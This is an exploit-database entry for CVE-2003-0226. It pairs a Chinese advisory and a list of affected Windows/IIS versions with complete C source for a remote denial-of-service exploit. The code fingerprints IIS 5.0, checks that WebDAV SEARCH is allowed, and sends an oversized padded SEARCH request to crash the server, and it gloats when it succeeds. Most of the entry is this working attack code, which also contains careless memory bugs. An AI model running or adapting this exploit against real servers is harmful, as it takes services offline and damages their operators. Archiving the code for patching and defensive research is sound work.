MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit

2003-05-31T00:00:00
ID SSV:15237
Type seebug
Reporter Root
Modified 2003-05-31T00:00:00

Description

<p>漏洞描述: Microsoft IIS 5.0(Internet Infomation Server 5)是Microsoft Windows 2000自带的一个网络信息服务器,其中包含HTTP服务功能。IIS5 默认提供了对WebDAV的支持,通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。 WebDAV实现对部分模式的超长请求处理不正确,远程攻击者可以利用这个漏洞对IIS服务进行拒绝服务攻击。 攻击者可以使用'PROPFIND'或'SEARCH'请求方法,提交包含49,153字节的Webdav请求,IIS会由于拒绝服务而重新启动。不过IIS 5.0会自动重新启动。</p><p>CVE-ID:CVE-2003-0226</p><p>CNNVD-ID:CNNVD-200306-027</p><p>CVE官方链接:<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0226" rel="nofollow">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0226</a></p><p>- 受影响的程序版本 </p><p>Microsoft IIS 5.1 </p><p>- Microsoft Windows 2000 Advanced Server SP2 </p><p> - Microsoft Windows 2000 Advanced Server SP1 </p><p> - Microsoft Windows 2000 Advanced Server </p><p>  - Microsoft Windows 2000 Datacenter Server SP2 </p><p>- Microsoft Windows 2000 Datacenter Server SP1</p><p>  - Microsoft Windows 2000 Datacenter Server </p><p>  - Microsoft Windows 2000 Professional SP2</p><p>  - Microsoft Windows 2000 Professional SP1</p><p>  - Microsoft Windows 2000 Professional </p><p>  - Microsoft Windows 2000 Server SP2 </p><p> - Microsoft Windows 2000 Server SP1 </p><p> - Microsoft Windows 2000 Server </p><p>+ Microsoft Windows XP 64-bit Edition SP1 </p><p>+ Microsoft Windows XP 64-bit Edition </p><p>  + Microsoft Windows XP 64-bit Edition</p><p>   - Microsoft Windows XP Home SP1</p><p>  - Microsoft Windows XP Home SP1</p><p>  - Microsoft Windows XP Home </p><p>- Microsoft Windows XP Home </p><p>  + Microsoft Windows XP Professional SP1</p><p>  + Microsoft Windows XP Professional SP1 </p><p> + Microsoft Windows XP Professional </p><p>+ Microsoft Windows XP Professional Microsoft IIS 5.0 </p><p>- Microsoft Windows 2000 Advanced Server SP2</p><p>  - Microsoft Windows 2000 Advanced Server SP2</p><p>  - Microsoft Windows 2000 Advanced Server SP1 </p><p> - Microsoft Windows 2000 Advanced Server SP1</p><p>  + Microsoft Windows 2000 Advanced Server </p><p>+ Microsoft Windows 2000 Advanced Server </p><p>- Microsoft Windows 2000 Datacenter Server SP2</p><p>  - Microsoft Windows 2000 Datacenter Server SP2</p><p>  - Microsoft Windows 2000 Datacenter Server SP1 </p><p>- Microsoft Windows 2000 Datacenter Server SP1</p><p>  - Microsoft Windows 2000 Professional SP2 </p><p>- Microsoft Windows 2000 Professional SP2 </p><p> - Microsoft Windows 2000 Professional SP1 </p><p> - Microsoft Windows 2000 Professional SP1 </p><p>+ Microsoft Windows 2000 Professional </p><p>  + Microsoft Windows 2000 Professional </p><p>  - Microsoft Windows 2000 Server SP2</p><p>  - Microsoft Windows 2000 Server SP2</p><p>  - Microsoft Windows 2000 Server SP1</p><p>  - Microsoft Windows 2000 Server SP1 </p><p> + Microsoft Windows 2000 Server </p><p>  + Microsoft Windows 2000 Server Microsoft IIS 6.0 </p><p>+ Microsoft Windows Server 2003 Datacenter Edition</p><p>   + Microsoft Windows Server 2003 Datacenter Edition </p><p>  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Enterprise Edition </p><p>+ Microsoft Windows Server 2003 Enterprise Edition </p><p>+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0 </p><p> + Microsoft Windows Server 2003 Standard Edition </p><p>+ Microsoft Windows Server 2003 Standard Edition</p><p>   + Microsoft Windows Server 2003 Web Edition</p><p>   + Microsoft Windows Server 2003 Web Edition</p><p>  - 不受影响的程序版本 </p><p>Microsoft IIS 6.0 </p><p>+ Microsoft Windows Server 2003 Datacenter Edition </p><p>+ Microsoft Windows Server 2003 Datacenter Edition </p><p>  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0</p><p>  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Enterprise Edition</p><p>   + Microsoft Windows Server 2003 Enterprise Edition </p><p>  + Microsoft Windows Server 2003 Enterprise Edition Itanium 0</p><p>  + Microsoft Windows Server 2003 Enterprise Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Standard Edition </p><p>+ Microsoft Windows Server 2003 Standard Edition </p><p>+ Microsoft Windows Server 2003 Web Edition </p><p>+ Microsoft Windows Server 2003 Web Edition </p><p> </p><p>解决方案:官方已发布报告,请升级到不受影响的版本或最新版本。 </p>

                                        
                                            
                                                /*

Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit 

that makes use of the vulnerability recently published by SPI dynamics

Published on 31.05.2003

*/

#include &lt;windows.h&gt;
#include &lt;winsock.h&gt;
#include &lt;stdio.h&gt;

#pragma comment (lib,&quot;ws2_32&quot;)

void graphitte()

{printf(&quot;\n********************************** &quot;);
printf(&quot;\n   Webdav MICROSOFT IIS DoS Exploit     * \n&quot;);
printf(&quot;+++++++++++++++++++++++++++++++*\n&quot;);
printf(&quot; by Shachank Pandrey                                *\n&quot;);
printf(&quot;*************************************\n&quot;);

}

char *funk(char tobesent[100],char *host)
{
int s; char got[100]; 

WSADATA wsaData;

struct hostent *yo;
struct sockaddr_in heck;

char lala[100];


if(WSAStartup(0x0101,&amp;wsaData)!=0) {
printf(&quot;error starting winsock..&quot;);
return 0;
}

if ((yo = gethostbyname(host))==0){
printf(&quot;error: can't resolve '%s'&quot;,host);
return 0;
}


heck.sin_port = htons(80);
heck.sin_family = AF_INET;
heck.sin_addr = *((struct in_addr *)yo-&gt;h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf(&quot;Error: Unable to create socket&quot;);

}


if ((connect(s, (struct sockaddr *) &amp;heck, sizeof(heck))) == -1){
printf(&quot;Error: Cudn't Connect\r\n&quot;);

}

memset(lala,0,sizeof(lala));

sprintf(lala,&quot;%s&quot;,tobesent,sizeof(tobesent));

send(s,lala,strlen(lala),0);
recv(s,got,100,0);

return got;
closesocket(s);
WSACleanup();
printf(&quot;done.\n&quot;);

}


int main(int argc, char *argv[])
{

WSADATA wsaData;

int s;char mysend[100];
char *gotme;
char trash[100];


struct hostent *yo;
struct sockaddr_in heck;
char buffer[65535] =&quot;&quot;;
char myrequest[80000]; 
char content[] =
&quot;&lt;?xml version=\&quot;1.0\&quot;?&gt;\r\n&quot;
&quot;&lt;g:searchrequest xmlns:g=\&quot;DAV:\&quot;&gt;\r\n&quot;
&quot;&lt;g:sql&gt;\r\n&quot;
&quot;Select \&quot;DAV:displayname\&quot; from scope()\r\n&quot;
&quot;&lt;/g:sql&gt;\r\n&quot;
&quot;&lt;/g:searchrequest&gt;\r\n&quot;;



graphitte();

if(WSAStartup(0x0101,&amp;wsaData)!=0) {
printf(&quot;Error :Cudn't initiate winsock!&quot;);
return 0;
}

if(argc&lt;2)

{printf(&quot;\nUsage : %s &lt;I.P./Hostname&gt;\n\n&quot;,argv[0]);
exit(0);}

if ( (yo = gethostbyname(argv[1]))==0)
{
printf(&quot;error: can't resolve '%s'&quot;,argv[1]);
return 1;
}

printf(&quot;\nChecking web server %s\n&quot;,argv[1]);
gotme=(char *)funk(&quot;GET / HTTP/1.0\r\n\n&quot;,argv[1]);


if (strstr(gotme,&quot;IIS/5.0&quot;) == NULL)

{ printf(&quot;\n\r----&gt; %s is not running IIS 5.0! adios !\n&quot;,argv[1]); } 


else

{ 

printf(&quot;\n\r----&gt; Aww rite! IIS 5.0 found on %s !\n&quot;,argv[1]);

sprintf(mysend,&quot;SEARCH / HTTP/1.0\r\n\n&quot;,40);

gotme=(char *)funk(mysend,argv[1]);

if (strstr(gotme,&quot;HTTP/1.1 411 Length Required&quot;) != NULL)

{ printf(&quot;\n\r----&gt; METHOD SEARCH ALLOWED\r\n&quot;); } 


else

{

printf(&quot;\n----&gt; Method SEARCH not Allowed ! adios...\n&quot;);
exit(0);

} 

heck.sin_port = htons(80);
heck.sin_family = AF_INET;
heck.sin_addr = *((struct in_addr *)yo-&gt;h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf(&quot;error: can't create socket&quot;);
return 1;
}


if ((connect(s, (struct sockaddr *) &amp;heck, sizeof(heck))) == -1){
printf(&quot;Error:Cudn't Connect\r\n&quot;);
return 1;
}

buffer[sizeof(buffer)]=0x00;

memset(buffer,'S',sizeof(buffer));
memset(myrequest,0,sizeof(myrequest));
memset(trash,0,sizeof(trash));
sprintf(myrequest,&quot;SEARCH /%s HTTP/1.1\r\nHost: %s\r\
nContent-type: text/xml\r\nContent-Length: &quot;,buffer,argv[1]);
sprintf(myrequest,&quot;%s%d\r\n\r\n&quot;,myrequest,strlen(content));
printf(&quot;\r\nDoSsing the server...&lt;pray&gt;\n&quot;);
send(s,myrequest,strlen(myrequest),0);

send(s,content,strlen(content),0);

recv(s,trash,sizeof(trash),0);
if(trash[0]==0x00) 
{
printf(&quot;Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n&quot;);

} 
else

printf(&quot;Server is prolly patched.\r\n&quot;);

closesocket(s);


}

WSACleanup();

return 1;
}

// milw0rm.com [2003-05-31]